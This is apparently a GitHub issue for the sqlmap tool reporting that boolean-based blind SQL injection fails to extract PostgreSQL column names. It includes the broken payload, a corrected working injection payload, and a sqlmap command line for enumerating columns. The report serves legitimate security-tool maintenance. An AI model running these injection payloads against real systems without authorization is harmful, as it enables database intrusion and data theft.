Unable to retrieve column names - Boolean-based Blind in PostgreSQL #4306
Description
Describe the bug
sqlmap is not able to extract column names while exploiting boolean-based blind sqli in postgresql. It works smooth for extracting database names, user, hostname, etc. Checking the verbose mode, the payload seems not to be working correctly.
The payload used by sqlmap (not working):
' AND ASCII(SUBSTRING((SELECT COUNT(attname) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON pg_class.oid=pg_attribute.attrelid
WHERE pg_class.relnamespace=pg_namespace.oid AND pg_type.oid=pg_attribute.atttypid AND attnum>0 AND pg_class.relname='<table_name>' AND nspname='<schema_name>')::text FROM 1 FOR 1))>0 AND 'CxED'='CxEDWorking payload:
' AND ASCII(SUBSTRING((SELECT COUNT(attname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='<table_name>' AND nspname='<schema_name>' LIMIT 1)::text FROM 1 FOR 1))>0 AND 'CxED'='CxEDTo Reproduce
- Run sqlmap -r 1.sql --force-ssl --dbs --no-cast -D <schema_name> -T <table_name> --columns --technique B -v 3
- See error
[ERROR] unable to retrieve the number of columns for table '<table_name>' in database '<schema_name>'
Expected behavior
Be able to extract columns names, the same way it is extracting other information like schema name and others.
Screenshots
Running environment:
- sqlmap version 1.2.4#stable
- Installation method: apt
- Operating system: Ubuntu 18.04
- Python version 3.6.9
Target details:
- DBMS: PostgreSQL
- SQLi techniques found by sqlmap: boolean-based blind
- WAF/IPS: N/A
- Relevant console output [if any]
- Exception traceback [if any]
[ERROR] unable to retrieve the number of columns for table '<table_name>' in database '<schema_name>'
Additional context
While testing the payloads, I wrote my own script for exploiting the sql injection with the "fixed" payload. I put the link in case it is useful.
https://github.com/victorcamposm/sqlinjector